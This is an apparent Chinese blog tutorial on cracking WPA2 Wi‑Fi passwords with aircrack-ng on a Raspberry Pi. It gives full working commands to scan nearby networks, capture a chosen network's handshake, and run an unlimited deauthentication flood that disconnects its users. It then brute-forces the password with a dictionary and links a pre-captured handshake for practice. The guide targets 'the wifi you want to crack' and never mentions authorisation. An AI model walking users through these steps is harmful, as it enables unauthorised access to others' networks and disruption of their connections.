树莓派-破解无线网络密码
作者:爱编程的小金毛球球 日期:2021年4月23日
所需设备:树莓派、网线、笔记本、无线网卡、路由器
一、工具说明
aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
aircrack-ng套件包括:
二、安装
sudo apt-get install aircrack-ng
查看是否安装成功
aircrack-ng
三、查看可用的无线网卡
sudo airmon-ng
四、将无线网卡以监听模式启动
sudo airmon-ng start wlan1
五、扫描周围WiFi
airodump-ng wlan1mon
BSSID:WiFi的MAC地址、PWR:信号强度(结果一般是按强度排序)、Data:监听期间流量综合、CH:WiFi所使用信道、ENC:加密算法、ESSID:WiFi名称
搜寻到自己要破解的wifi后直接按Ctrl+C终止命令即可
98:0D:51:2C:E5:A8 -42 231 1592 0 11 360 WPA2 CCMP
PSK 717
目标是名为717的WiFi,其BSSID为98:0D:51:2C:E5:A8,信道为11
六、开始抓取握手包并保存成文件
(为了方便期间,最好创建专门的文件夹wireless_security)
airodump-ng -c 11 --bssid 98:0D:51:2C:E5:A8 -w /home/pi/wireless_security wlan1mon
#-c指定信道,一定要是上一步查到的要破解的wifi所用信道
#–bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
#-w指定捕获的握手到保存到的文件名
从上面动态信息可以看出有1个连接(或者多个),这就可以进行洪水攻击然后拿到握手包,如果刚进去没有看到任何连接,先等待20秒左右,还是没有的话你就得重新选择目标了。在这里说明一下,要想抓到握手包就得进行洪水攻击,攻击的时候连接路由器的手机或者电脑会断开连接然后会自动连接wifi,连接的过程中就有一个数据的传送,而上面的airodump-ng就是要抓取这些数据,拿到需要破解的握手包,即.cap文件。
七、洪水攻击强制对方WiFi断开重连
(保持刚才的窗口,重新开一个窗口进行操作)
sudo aireplay-ng -0 0 -a 98:0D:51:2C:E5:A8 -c 5E:B9:8E:F7:7C:DE wlan1mon
(0为用deauth洪水攻击WiFi设备的次数,0为无限,-0 5则攻击5次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)
注:为什么要穷举,而不是直接从数据包里面获取密码?因为数据包里面的密码是哈希加密的,哈希加密只能正向,不能反向推导,所以需要一个个正向推导,直到找到正确的密码。
这个时候就注意抓包的窗口,出现WPA handshake :,就表示成功。如果有连接很快就可以抓到包,右上角证明成功抓取到重新认证的98:0D:51:2C:E5:A8的握手包 。成败的关键!!!!!!!!!!
使用Ctrl + C终止抓包命令
此时会在指定的目录产生以下四个文件(每执行一次抓包命令就会产生一组,所以抓包时要注意自己是第几次执行的;不管也行下一步执定文件时使用*号通配符即可)
然后就要进行跑包,就需要密码字典,可以从UCBUG下载。
八、使用字典文件暴力破解密码
sudo aircrack-ng -w DIR.txt ~/wireless_security/*.cap
或者
sudo aircrack-ng -a2 -b 98:0D:51:2C:E5:A8 -w DIR.txt ~/wireless_security/*.cap
#-a2 代表WPA的握手包
#-w指定要使用口令字典文件
#-b指定要目标wifi的mac地址(亦即bssid)
#*.cap是抓取到握手包的数据包文件,*是通配符
如果字典文件中存在WiFi的密码,那就能找到WiFi的密码,如果不包含那就找不到(所以总的来说WiFi成功破解率依赖于字典大小)。
九、关闭网卡监听模式(可选)
在前面步骤中,我们使用airmon-ng将网卡以监听模式启动,最后将网卡还原
airmon-ng stop wlan1mon
注:
如果你不幸,在关键部分失败,那也没有关系,这里有已经
抓取到的握手包,你只需要导入,尝试一下后续步骤即可(内含假的密码字典一个0.0),记得点赞啊亲~~~~
链接:https://pan.baidu.com/s/1Kl8gIaIZc8Oz88pwHkzprA 提取码:3joo